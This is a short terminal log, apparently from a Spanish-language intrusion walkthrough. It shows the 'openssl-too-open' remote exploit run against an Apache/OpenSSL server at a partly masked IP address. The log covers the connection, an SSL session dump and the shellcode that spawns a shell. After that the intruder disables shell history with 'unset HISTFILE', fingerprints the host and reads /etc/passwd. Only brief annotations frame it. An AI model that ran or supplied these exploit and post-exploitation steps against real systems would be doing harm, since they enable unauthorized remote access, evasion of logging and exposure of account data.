bash-2.04# ./solar 0x1a 200.xxx.100.24 -c 30
: openssl-too-open.c - OpenSSL remote apache exploit
by Solar Eclipse <solareclipse@phreedom.org>
: Private 0dd code.
Opening connections... 30 of 30
Establishing SSL connection
Session:
0000 - c0 da ab cb 39 39 43 1f 7f 51 08 2a 37 4f fe de
0010 - 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0020 - 20 00 00 00 63 64 32 36 63 36 32 30 65 35 32 35
0030 - 62 34 37 63 62 36 30 31 37 38 39 32 62 64 66 63
0040 - 37 39 63 32 00 00 00 00 b8 62 12 08 00 00 00 00
0050 - 00 00 00 00 01 00 00 00 2a 01 00 00 56 17 e5 3d
0060 - 00 00 00 00 ac 14 32 40 00 00 00 00 58 62 12 08
0070 -
cipher: 0x403214ac ciphers: 0x8126258
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.04$
bash-2.04$ unset HISTFILE; uname -a; id; echo ‘Welcome master!’
Linux localhost.domain 2.2.17-14cl #1 qui nov 2 00:24:54 EST 2000 i686 unknown
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
Welcome master! (todo esto se ejecuta de modo automatico)
bash-2.04$
bash-2.04$ cat /etc/passwd - El intruso mira (aun sin privilegios)